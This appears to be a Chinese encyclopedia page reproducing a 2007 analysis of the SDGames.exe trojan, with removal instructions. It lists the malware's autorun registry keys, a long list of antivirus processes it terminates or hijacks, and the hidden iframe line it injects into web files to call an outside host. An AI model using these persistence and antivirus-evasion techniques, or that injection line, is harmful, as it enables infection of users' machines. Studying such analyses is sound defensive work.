“SDGames.exe”的意思、由来-中文百科全书

恶性病毒 SDGames.exe（小瓢虫）

文件名称：SDGames.exe

文件大小：59282 byte

A V命名：

Trojan.Win32.VB.yth(瑞星)

Trojan-Downloader.Win32.VB.lg(卡巴斯基)

Win32.Troj.Downloader.vb.237568（金山）

加壳方式：北斗4.1

编写语言：Microsoft Visual Basic 5.0 / 6.0

文件MD5：fc334ffcf5aff3ca8235705d61f62990

主要表现为：

1.攻击杀毒软件之后进行IFEO映像劫持

2.感染htm等网页文件

3.感染或覆盖exe等可执行文件

4.破坏安全模式

5.破坏显示隐藏文件文件夹选项等

6.修改系统时间并锁定时间

7.可通过U盘等移动存储传播

8.关闭Windows防火墙等服务并打开许多危险服务，并使得用户磁盘被共享

9.后台添加账户并设定管理员权限

10.修改某些文件关联

下面为具体分析

File: SDGames.exe

Size: 59282 bytes

File Version: 3.02

Modified: 2007年12月6日, 17:56:32

MD5: FC334FFCF5AFF3CA8235705D61F62990

SHA1: 4DFFE9E9BB666A13CC646EBA4371BDF4AFFB49BC

CRC32: 1DD096C2

1.病毒运行后，释放如下文件或副本

%systemroot%\\system32\\SDGames.exe

%systemroot%\\system32\\Taskeep.vbs

%systemroot%\\system32\\Avpser.cmd

%systemroot%\\system32\etshare.cmd

%systemroot%\\system32\\AUTORUN.INF

在每个磁盘分区释放SDGames.exe和AUTORUN.INF 达到通过U盘传播的目的

并且在每个分区释放Windows.url，新建文件夹.url，Recycleds.url指向该分区根目录下的SDGames.exe

诱使用户点击

2.修改reg和txt文件关联指向%systemroot%\\system32\\SDGames.exe

3.删除HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\etwork\\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\etwork\\{4D36E967-E325-11CE-BFC1-08002BE10318}

破坏安全模式

4.创建自启动项目

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows]

<load><%systemroot%\\system32\\SDGames.exe> [SDGame]

<run><%systemroot%\\system32\\SDGames.exe> [SDGame]

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]

<Winstary><%systemroot%\\system32\\SDGames.exe> [SDGame]

5.破坏系统的一些功能

禁用cmd:HKCU\\Software\\Policies\\Microsoft\\Windows\\System\\DisableCMD

破坏显示隐藏文件：HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden

HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\CheckedValue

使得文件扩展名无法显示：HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt

隐藏控制面板：

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\oControlPanel

禁用注册表编辑器

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistrytools

禁用任务管理器

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr

修改IE主页为：http://www.*.10mb.cn

修改IE默认页为：wangma

隐藏文件夹选项

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\oFolderOptions

6.关闭如下服务并将其启动类型设为禁用

Alg

sharedaccess

wuauserv

7.开启下列服务并将其启动类型设为自动

Terminal Services

winmgmt

lanmanserver

8.%systemroot%\\system32\etshare.cmd将用户的所有磁盘设为共享

9.添加一个名为guest的账户，并将其设置为管理员权限

10.攻击反病毒软件，利用Avpser.cmd强制结束一些杀毒软件进程

RavMonD.exe

RavStub.exe

Anti*

AgentSvr*

CCenter*

Rsaupd*

SmartUp*

FileDsty*

RegClean*

360tray*

360safe*

kabaload*

safelive*

KASTask*

kpFW32*

kpFW32X*

KvXP_1*

KVMonXP_1*

KvReport*

KvXP*

KVMonXP*

nter*

TrojDie*

avp.com

KRepair.COM

Trojan*

KvNative*

Virus*

Filewall*

Kaspersky*

JiangMin*

RavMonD*

RavStub*

RavTask*

adam*

cSet*

PFWliveUpdate*

mmqczj*

Trojanwall*

Ras.exe

runiep.exe

avp.exe

PFW.exe

rising*

ikaka*

.duba*

kingsoft*

木马*

社区*

aswBoot*

MainCon*

Regs*

AVP*

Task*

regedit*

Ras*

srgui*

norton*

avp*

fire*

spy*

bullguard*

PersFw*

KAV*

ZONEALARM*

SAFEWEB*

OUTPOST*

ESAFE*

clear*

BLACKICE*

360safe.exe

Shadowservice.exe

v3webnt.exe

v3sd32.exe

v3monsvc.exe

sysmonnt.exe

hkcmd.exe

DNTUS26.EXE

AhnSD.exe

CTFMON.EXE

MonsysNT.exe

awrem32.exe

WINAW32.EXE

PNTIOMON.exe

avgw.exe

avgcc32.exe

PROmon.exe

PNTIOMON.exe

MagicSet.exe

MainCon.exe

TrCleaner.exe

WmNetPro.exe

修复*

保护*

11.映像劫持杀毒软件和一些常用工具

360rpt.exe

360Safe.exe

360tray.EXE

adam.exe

AgentSvr.exe

AppSvc32.exe

autoruns.exe

avgrssvc.exe

AvMonitor.exe

avp.com

avp.exe

CCenter.exe

ccSvcHst.exe

FileDsty.exe

FTCleanerShell.exe

HijackThis.exe

IceSword.exe

iparmo.exe

Iparmor.exe

isPwdSvc.exe

kabaload.exe

KaScrScn.SCR

KASMain.exe

KASTask.exe

KAV32.exe

KAVDX.exe

KAVPFW.exe

KAVSetup.exe

KAVStart.exe

KISLnchr.exe

KMailMon.exe

KMFilter.exe

Knod32kui.exe

KPFW32.exe

KPFW32X.exe

KPFWSvc.exe

KRegEx.exe

KRepair.COM

KsLoader.exe

KVCenter.kxp

KvDetect.exe

KvfwMcl.exe

KVMonXP.kxp

KVMonXP_1.kxp

kvol.exe

kvolself.exe

KvReport.kxp

KVScan.kxp

KVSrvXP.exe

KVStub.kxp

kvupload.exe

kvwsc.exe

KvXP.kxp

KvXP_1.kxp

KWatch9x.exe

KWatchX.exe

loaddll.exe

MagicSet.exe

MainCon.exe

mcconsol.exe

mmqczj.exe

mmsk.exe

msconfig.exe

NAVSetup.exe

nod32krn.exe

PFW.exe

PFWLiveUpdate.exe

QHSET.exe

QQ.exe

Ras.exe

Rav.exe

RavMon.exe

RavMonD.exe

RavStub.exe

RavTask.exe

RegClean.exe

rfwcfg.exe

RfwMain.exe

rfwProxy.exe

rfwsrv.exe

Rsaupd.exe

runiep.exe

safelive.exe

scan32.exe

Shadowservice.exe

shcfg32.exe

SmartUp.exe

SREng.exe

srgui.exe

symlcsvc.exe

SysSafe.exe

TrojanDetector.exe

Trojanwall.exe

TrojDie.kxp

UIHost.exe

UmxAgent.exe

UmxAttachment.exe

UmxCfg.exe

UmxFwHlp.exe

UmxPol.exe

UpLive.EXE.exe

WoptiClean.exe

zxsweep.exe

12.遍历感染非系统分区的exe文件（覆盖方式）

13.遍历感染非系统分区的jsp asp php htm html hta文件

在其末尾加入<iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0" src="http://*.10mb.cn/" name="Myframe"

align="center" border="0">的代码

14.修改系统时间的年份为2030年，并禁止用户修改时间

15.隐藏系统文件夹

解决办法：

下载sreng：http://download.kztechs.com/files/sreng2.zip

Icesword：http://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip

1.解压缩Icesword

把Icesword改名为1.exe运行

进程中找到SDGames.exe 右击它结束进程

然后点击 Icesword左下角的文件按钮

找到如下文件并删除

%systemroot%\\system32\\SDGames.exe

%systemroot%\\system32\\Taskeep.vbs

%systemroot%\\system32\\Avpser.cmd

%systemroot%\\system32\etshare.cmd

%systemroot%\\system32\\AUTORUN.INF

以及各个分区下面的

SDGames.exe,AUTORUN.INF,Windows.url，新建文件夹.url，Recycleds.url

2.运行sreng

（由于时间已经被改为2030年所以sreng会弹出过期提示，不用担心，输入下面的授权码即可使用）

用户名：teyqiu

授权号：26129027541185431409013556

打开sreng后点击系统修复－文件关联－修复

系统修复－Windows Shell/IE －全选－修复

高级修复－修复安全模式

3.还是sreng中

启动项目注册表删除如下项目

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows]

<load><%systemroot%\\system32\\SDGames.exe> [SDGame]

<run><%systemroot%\\system32\\SDGames.exe> [SDGame]

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]

<Winstary><%systemroot%\\system32\\SDGames.exe> [SDGame]

并删除所有红色的IFEO项目

启动项目 System.ini

删除Windows节点

4.取消磁盘共享

开始运行输入cmd 输入如下命令

net share c /delete

net share d /delete

...

以此类推分别取消所有磁盘分区的共享

5.显示系统文件夹

开始运行输入cmd 输入如下命令

attrib -h %systemroot%\\system32

6.修复受感染的htm等网页文件

推荐使用CSI的iframkill

下载地址：http://www.vaid.cn/blog/read.php?9

词条	SDGames.exe
释义	恶性病毒 SDGames.exe（小瓢虫）文件名称：SDGames.exe 文件大小：59282 byte A V命名： Trojan.Win32.VB.yth(瑞星) Trojan-Downloader.Win32.VB.lg(卡巴斯基) Win32.Troj.Downloader.vb.237568（金山）加壳方式：北斗4.1 编写语言：Microsoft Visual Basic 5.0 / 6.0 文件MD5：fc334ffcf5aff3ca8235705d61f62990 主要表现为： 1.攻击杀毒软件之后进行IFEO映像劫持 2.感染htm等网页文件 3.感染或覆盖exe等可执行文件 4.破坏安全模式 5.破坏显示隐藏文件文件夹选项等 6.修改系统时间并锁定时间 7.可通过U盘等移动存储传播 8.关闭Windows防火墙等服务并打开许多危险服务，并使得用户磁盘被共享 9.后台添加账户并设定管理员权限 10.修改某些文件关联下面为具体分析 File: SDGames.exe Size: 59282 bytes File Version: 3.02 Modified: 2007年12月6日, 17:56:32 MD5: FC334FFCF5AFF3CA8235705D61F62990 SHA1: 4DFFE9E9BB666A13CC646EBA4371BDF4AFFB49BC CRC32: 1DD096C2 1.病毒运行后，释放如下文件或副本 %systemroot%\\system32\\SDGames.exe %systemroot%\\system32\\Taskeep.vbs %systemroot%\\system32\\Avpser.cmd %systemroot%\\system32\etshare.cmd %systemroot%\\system32\\AUTORUN.INF 在每个磁盘分区释放SDGames.exe和AUTORUN.INF 达到通过U盘传播的目的并且在每个分区释放Windows.url，新建文件夹.url，Recycleds.url指向该分区根目录下的SDGames.exe 诱使用户点击 2.修改reg和txt文件关联指向%systemroot%\\system32\\SDGames.exe 3.删除HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\etwork\\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\etwork\\{4D36E967-E325-11CE-BFC1-08002BE10318} 破坏安全模式 4.创建自启动项目 [HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows] <load><%systemroot%\\system32\\SDGames.exe> [SDGame] <run><%systemroot%\\system32\\SDGames.exe> [SDGame] [HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run] <Winstary><%systemroot%\\system32\\SDGames.exe> [SDGame] 5.破坏系统的一些功能禁用cmd:HKCU\\Software\\Policies\\Microsoft\\Windows\\System\\DisableCMD 破坏显示隐藏文件：HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\CheckedValue 使得文件扩展名无法显示：HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt 隐藏控制面板： HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\oControlPanel 禁用注册表编辑器 HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistrytools 禁用任务管理器 HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr 修改IE主页为：http://www..10mb.cn 修改IE默认页为：wangma 隐藏文件夹选项 HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\oFolderOptions 6.关闭如下服务并将其启动类型设为禁用 Alg sharedaccess wuauserv 7.开启下列服务并将其启动类型设为自动 Terminal Services winmgmt lanmanserver 8.%systemroot%\\system32\etshare.cmd将用户的所有磁盘设为共享 9.添加一个名为guest的账户，并将其设置为管理员权限 10.攻击反病毒软件，利用Avpser.cmd强制结束一些杀毒软件进程 RavMonD.exe RavStub.exe Anti AgentSvr* CCenter* Rsaupd* SmartUp* FileDsty* RegClean* 360tray* 360safe* kabaload* safelive* KASTask* kpFW32* kpFW32X* KvXP_1* KVMonXP_1* KvReport* KvXP* KVMonXP* nter* TrojDie* avp.com KRepair.COM Trojan* KvNative* Virus* Filewall* Kaspersky* JiangMin* RavMonD* RavStub* RavTask* adam* cSet* PFWliveUpdate* mmqczj* Trojanwall* Ras.exe runiep.exe avp.exe PFW.exe rising* ikaka* .duba* kingsoft* 木马* 社区* aswBoot* MainCon* Regs* AVP* Task* regedit* Ras* srgui* norton* avp* fire* spy* bullguard* PersFw* KAV* ZONEALARM* SAFEWEB* OUTPOST* ESAFE* clear* BLACKICE* 360safe.exe Shadowservice.exe v3webnt.exe v3sd32.exe v3monsvc.exe sysmonnt.exe hkcmd.exe DNTUS26.EXE AhnSD.exe CTFMON.EXE MonsysNT.exe awrem32.exe WINAW32.EXE PNTIOMON.exe avgw.exe avgcc32.exe PROmon.exe PNTIOMON.exe MagicSet.exe MainCon.exe TrCleaner.exe WmNetPro.exe 修复* 保护* 11.映像劫持杀毒软件和一些常用工具 360rpt.exe 360Safe.exe 360tray.EXE adam.exe AgentSvr.exe AppSvc32.exe autoruns.exe avgrssvc.exe AvMonitor.exe avp.com avp.exe CCenter.exe ccSvcHst.exe FileDsty.exe FTCleanerShell.exe HijackThis.exe IceSword.exe iparmo.exe Iparmor.exe isPwdSvc.exe kabaload.exe KaScrScn.SCR KASMain.exe KASTask.exe KAV32.exe KAVDX.exe KAVPFW.exe KAVSetup.exe KAVStart.exe KISLnchr.exe KMailMon.exe KMFilter.exe Knod32kui.exe KPFW32.exe KPFW32X.exe KPFWSvc.exe KRegEx.exe KRepair.COM KsLoader.exe KVCenter.kxp KvDetect.exe KvfwMcl.exe KVMonXP.kxp KVMonXP_1.kxp kvol.exe kvolself.exe KvReport.kxp KVScan.kxp KVSrvXP.exe KVStub.kxp kvupload.exe kvwsc.exe KvXP.kxp KvXP_1.kxp KWatch9x.exe KWatchX.exe loaddll.exe MagicSet.exe MainCon.exe mcconsol.exe mmqczj.exe mmsk.exe msconfig.exe NAVSetup.exe nod32krn.exe PFW.exe PFWLiveUpdate.exe QHSET.exe QQ.exe Ras.exe Rav.exe RavMon.exe RavMonD.exe RavStub.exe RavTask.exe RegClean.exe rfwcfg.exe RfwMain.exe rfwProxy.exe rfwsrv.exe Rsaupd.exe runiep.exe safelive.exe scan32.exe Shadowservice.exe shcfg32.exe SmartUp.exe SREng.exe srgui.exe symlcsvc.exe SysSafe.exe TrojanDetector.exe Trojanwall.exe TrojDie.kxp UIHost.exe UmxAgent.exe UmxAttachment.exe UmxCfg.exe UmxFwHlp.exe UmxPol.exe UpLive.EXE.exe WoptiClean.exe zxsweep.exe 12.遍历感染非系统分区的exe文件（覆盖方式） 13.遍历感染非系统分区的jsp asp php htm html hta文件在其末尾加入<iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0" src="http://*.10mb.cn/" name="Myframe" align="center" border="0">的代码 14.修改系统时间的年份为2030年，并禁止用户修改时间 15.隐藏系统文件夹解决办法：下载sreng：http://download.kztechs.com/files/sreng2.zip Icesword：http://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip 1.解压缩Icesword 把Icesword改名为1.exe运行进程中找到SDGames.exe 右击它结束进程然后点击 Icesword左下角的文件按钮找到如下文件并删除 %systemroot%\\system32\\SDGames.exe %systemroot%\\system32\\Taskeep.vbs %systemroot%\\system32\\Avpser.cmd %systemroot%\\system32\etshare.cmd %systemroot%\\system32\\AUTORUN.INF 以及各个分区下面的 SDGames.exe,AUTORUN.INF,Windows.url，新建文件夹.url，Recycleds.url 2.运行sreng （由于时间已经被改为2030年所以sreng会弹出过期提示，不用担心，输入下面的授权码即可使用）用户名：teyqiu 授权号：26129027541185431409013556 打开sreng后点击系统修复－文件关联－修复系统修复－Windows Shell/IE －全选－修复高级修复－修复安全模式 3.还是sreng中启动项目注册表删除如下项目 [HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows] <load><%systemroot%\\system32\\SDGames.exe> [SDGame] <run><%systemroot%\\system32\\SDGames.exe> [SDGame] [HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run] <Winstary><%systemroot%\\system32\\SDGames.exe> [SDGame] 并删除所有红色的IFEO项目启动项目 System.ini 删除Windows节点 4.取消磁盘共享开始运行输入cmd 输入如下命令 net share c /delete net share d /delete ... 以此类推分别取消所有磁盘分区的共享 5.显示系统文件夹开始运行输入cmd 输入如下命令 attrib -h %systemroot%\\system32 6.修复受感染的htm等网页文件推荐使用CSI的iframkill 下载地址：http://www.vaid.cn/blog/read.php?9
随便看	李钰李钰彬李钰卿李钰钰李钺李钼子李铄石国学馆李铉李铉昌李铉民李铉升李铉杨李铉一李铉雨李铉在李铉洵李铎李铖李铠李铧李铨李颙李颙墓李飏李铮